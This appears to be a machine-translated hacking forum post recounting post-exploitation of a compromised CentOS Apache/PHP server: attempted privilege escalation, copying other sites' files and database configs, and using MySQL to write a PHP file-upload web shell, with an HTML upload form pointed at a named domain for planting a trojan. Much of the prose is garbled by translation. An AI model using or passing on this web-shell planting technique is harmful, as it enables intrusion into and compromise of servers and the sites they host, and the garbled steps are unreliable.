Low-privilege elevation in LINUX

Author: hackdn

Today, the client received a SHELL of Apache/2.2.3 (CentOS), which is written into the LINUX system. The PHP version 5.2.17 and MYSSQL environment were created without ASP and. NET.

First use the built-in command LS, UNAME, and no explicit, it must have set PHP. INI. The root directory has no write permission. It is estimated that CHMOD 777 will not be available even if it rebounded.

First, try to create a file in tmp, run the SHELL directory, execute the file, and launch the local NC listener. WHOAMI is the WWWROOT permission.

View version

You can CD it to the root directory (/var/www/virtual/) and then LS it. The entire website is out, and the folder name is not blind to the target site, but you do not have the permission to jump in.

Try to package TAR with no permissions. Try to package the target site directory file separately. Yes, but the root directory CONN. CONFIG is limited to the read permission of the current target site.

If you try to include the directory in the CP target station, you can copy the directory, but you cannot copy it. You can find the database configuration information and then run it on another server.

Back up the database with phpspyshell:

Some configuration information and accounts are viewed, but there is no background path or other sensitive information

The scan tool cannot scan the target website folder. It is estimated that it has been modified.

I tried to escalate the authority of mongoshell to USER or ROOT. I didn't directly look at Apache configuration settings. I tried WGET a few EXP, but it was useless. It is estimated that I had patched it.

Although CP can, but do not know the specific information

Since the WEB has no permissions, try MYSQL to see if it has permissions.

Direct

Create table hackdn (spider BLOB); CREATE a TABLE hackdn

Save one sentence

Back up the file to the target path 1. php. No connection is found.

CP, separated by anti-translated characters,

If 'is not added, insert <? Copy ($ _ FILES [MyFile] [tmp_name], $ _ FILES [MyFile] [name]);?>

After the backup is made to PHP, save the following code locally: 1. HTML

<Form ENCTYPE = "multipart/form-data" ACTION = "http://www.bkjia.com/mysql_bak/1.php" METHOD =" POST ">

<Input NAME = "MyFile" TYPE = "file">
<Input VALUE = "submit" TYPE = "submit">
</Form>

Upload the trojan directly and click OK.